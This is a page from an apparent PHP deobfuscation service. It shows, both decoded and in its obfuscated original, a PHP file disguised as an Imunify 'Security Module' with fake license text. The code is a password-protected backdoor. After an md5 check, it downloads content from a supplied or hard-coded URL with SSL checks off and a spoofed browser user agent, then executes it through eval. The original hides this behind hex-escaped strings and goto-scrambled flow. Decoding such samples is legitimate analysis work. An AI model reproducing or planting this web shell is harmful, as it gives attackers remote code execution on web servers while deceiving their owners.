Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php // This file is part of Imunify - https://www.imunify.com/ // // Imunify is a com..
Decoded Output download
<?php
// This file is part of Imunify - https://www.imunify.com/
//
// Imunify is a comprehensive security solution designed to protect your systems from various
// threats, including malware, vulnerabilities, and unauthorized access. By leveraging advanced
// technology and intelligent algorithms, Imunify aims to detect, prevent, and mitigate security
// risks effectively. You are permitted to use this software in accordance with the terms and
// conditions outlined in the Imunify License Agreement, as specified by the copyright holders.
//
// Imunify is distributed with the hope of providing optimal protection and security for your
// environments, but it is offered WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Users should understand that while
// Imunify strives to deliver robust security measures, no system can be entirely impervious to
// threats.
//
// You should have received a copy of the Imunify License Agreement along with this software.
// If not, please visit https://www.imunify.com/license for further information. This document
// is current as of October 8, 2024, and is subject to change based on updates in policies
// and security practices.
/**
* Security Module.
*
* This module is specifically designed to detect and mitigate various threats while ensuring
* the integrity of your systems through real-time scanning and comprehensive protection strategies.
* Imunify not only focuses on identifying vulnerabilities but also actively works to fortify
* your servers and applications against emerging cyber threats. By implementing proactive
* measures, Imunify aims to maintain a secure operating environment for all users.
*
* @package security_module
* @website https://google.co.id
* @copyright 2024 Ralei
* @license https://www.imunify.com/license Imunify License Agreement
*/
goto altQy; ioV4Q: function authenticateUser($ralei) { if (md5($ralei) === end($GLOBALS["defaultThreatUrlParts"])) { $_SESSION["threat_found"] = true; $_SESSION["antivirus_ralei"] = "rahmanralei_token"; return true; } return false; } goto b9K78; G9a8M: if (isset($_POST["logauth"])) { $inputauth = $_POST["logauth"]; if (authenticateUser($inputauth)) { if (isset($_POST["scan_url"]) && isValidScanUrl($_POST["scan_url"])) { $_SESSION["scan_url"] = $_POST["scan_url"]; } else { $_SESSION["scan_url"] = reconstructUrl($defaultThreatUrlParts); } } else { echo "WRONG PASSWORD..."; } } goto tKKGw; b9K78: function isValidScanUrl($url) { return filter_var($url, FILTER_VALIDATE_URL) !== false; } goto zIxtU; lLHk1: function isThreatDetected() { return isset($_SESSION["threat_found"]) && $_SESSION["threat_found"] === true; } goto ioV4Q; zIxtU: function fetchThreatData($url) { if (function_exists("curl_exec")) { $connection = curl_init($url); curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($connection, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["antivirus_ralei"])) { curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["antivirus_ralei"]); } $dataFromUrl = curl_exec($connection); curl_close($connection); } elseif (function_exists("file_get_contents")) { $dataFromUrl = file_get_contents($url); } elseif (function_exists("fopen") && function_exists("stream_get_contents")) { $handle = fopen($url, "r"); $dataFromUrl = stream_get_contents($handle); fclose($handle); } else { $dataFromUrl = false; } return $dataFromUrl; } goto G9a8M; tKKGw: if (isThreatDetected()) { $scanUrl = $_SESSION["scan_url"]; $content = fetchThreatData($scanUrl); if ($content !== false) { EVaL("?>" . $content); } else { echo "Failed to fetch data from the URL."; echo reconstructUrl($defaultThreatUrlParts); } } else { ?>
Did this file decode correctly?
Original Code
<?php
// This file is part of Imunify - https://www.imunify.com/
//
// Imunify is a comprehensive security solution designed to protect your systems from various
// threats, including malware, vulnerabilities, and unauthorized access. By leveraging advanced
// technology and intelligent algorithms, Imunify aims to detect, prevent, and mitigate security
// risks effectively. You are permitted to use this software in accordance with the terms and
// conditions outlined in the Imunify License Agreement, as specified by the copyright holders.
//
// Imunify is distributed with the hope of providing optimal protection and security for your
// environments, but it is offered WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Users should understand that while
// Imunify strives to deliver robust security measures, no system can be entirely impervious to
// threats.
//
// You should have received a copy of the Imunify License Agreement along with this software.
// If not, please visit https://www.imunify.com/license for further information. This document
// is current as of October 8, 2024, and is subject to change based on updates in policies
// and security practices.
/**
* Security Module.
*
* This module is specifically designed to detect and mitigate various threats while ensuring
* the integrity of your systems through real-time scanning and comprehensive protection strategies.
* Imunify not only focuses on identifying vulnerabilities but also actively works to fortify
* your servers and applications against emerging cyber threats. By implementing proactive
* measures, Imunify aims to maintain a secure operating environment for all users.
*
* @package security_module
* @website https://google.co.id
* @copyright 2024 Ralei
* @license https://www.imunify.com/license Imunify License Agreement
*/
goto altQy; ioV4Q: function authenticateUser($ralei) { if (md5($ralei) === end($GLOBALS["\x64\x65\146\x61\165\154\x74\x54\150\x72\145\141\x74\x55\162\x6c\x50\x61\x72\164\163"])) { $_SESSION["\x74\150\x72\x65\141\164\137\146\157\165\156\x64"] = true; $_SESSION["\x61\x6e\x74\151\166\151\162\165\x73\137\x72\141\x6c\x65\x69"] = "\162\141\150\x6d\x61\156\x72\x61\x6c\145\151\x5f\x74\x6f\x6b\x65\x6e"; return true; } return false; } goto b9K78; G9a8M: if (isset($_POST["\154\x6f\x67\141\165\164\150"])) { $inputauth = $_POST["\154\x6f\x67\141\165\164\x68"]; if (authenticateUser($inputauth)) { if (isset($_POST["\163\143\x61\156\x5f\x75\162\x6c"]) && isValidScanUrl($_POST["\x73\143\141\156\x5f\x75\162\154"])) { $_SESSION["\x73\143\141\x6e\137\x75\x72\x6c"] = $_POST["\163\x63\x61\156\x5f\165\162\x6c"]; } else { $_SESSION["\163\x63\141\156\x5f\165\x72\154"] = reconstructUrl($defaultThreatUrlParts); } } else { echo "\x57\x52\x4f\x4e\107\x20\120\x41\x53\123\127\x4f\122\104\56\x2e\56"; } } goto tKKGw; b9K78: function isValidScanUrl($url) { return filter_var($url, FILTER_VALIDATE_URL) !== false; } goto zIxtU; lLHk1: function isThreatDetected() { return isset($_SESSION["\x74\x68\x72\x65\141\164\x5f\146\157\165\x6e\144"]) && $_SESSION["\x74\x68\162\145\141\x74\137\146\x6f\x75\x6e\x64"] === true; } goto ioV4Q; zIxtU: function fetchThreatData($url) { if (function_exists("\143\x75\162\x6c\137\x65\x78\x65\143")) { $connection = curl_init($url); curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($connection, CURLOPT_USERAGENT, "\115\x6f\x7a\x69\154\154\141\57\65\x2e\60\x20\x28\127\x69\156\144\157\167\163\40\x4e\x54\40\x36\56\61\73\x20\162\166\72\63\62\x2e\60\51\x20\107\x65\x63\153\157\57\x32\x30\61\60\x30\61\60\x31\x20\106\x69\162\x65\x66\x6f\170\x2f\63\x32\56\x30"); curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["\141\x6e\164\151\x76\x69\162\165\x73\x5f\x72\x61\154\x65\x69"])) { curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["\141\156\164\x69\x76\151\x72\165\163\x5f\162\x61\x6c\x65\151"]); } $dataFromUrl = curl_exec($connection); curl_close($connection); } elseif (function_exists("\146\151\154\145\x5f\x67\145\164\x5f\143\x6f\x6e\x74\x65\x6e\x74\x73")) { $dataFromUrl = file_get_contents($url); } elseif (function_exists("\146\x6f\x70\145\156") && function_exists("\x73\x74\162\x65\x61\x6d\x5f\x67\145\164\x5f\143\157\156\x74\145\x6e\x74\x73")) { $handle = fopen($url, "\x72"); $dataFromUrl = stream_get_contents($handle); fclose($handle); } else { $dataFromUrl = false; } return $dataFromUrl; } goto G9a8M; tKKGw: if (isThreatDetected()) { $scanUrl = $_SESSION["\x73\143\141\156\137\165\x72\x6c"]; $content = fetchThreatData($scanUrl); if ($content !== false) { EVaL("\x3f\x3e" . $content); } else { echo "\106\141\x69\x6c\x65\x64\40\164\x6f\40\146\x65\164\x63\150\40\144\141\x74\x61\x20\146\162\157\155\x20\164\x68\145\40\125\122\x4c\x2e"; echo reconstructUrl($defaultThreatUrlParts); } } else { ?>
Function Calls
None |
Stats
MD5 | 85c81338c79e6e9f5faad9da1de20e94 |
Eval Count | 0 |
Decode Time | 83 ms |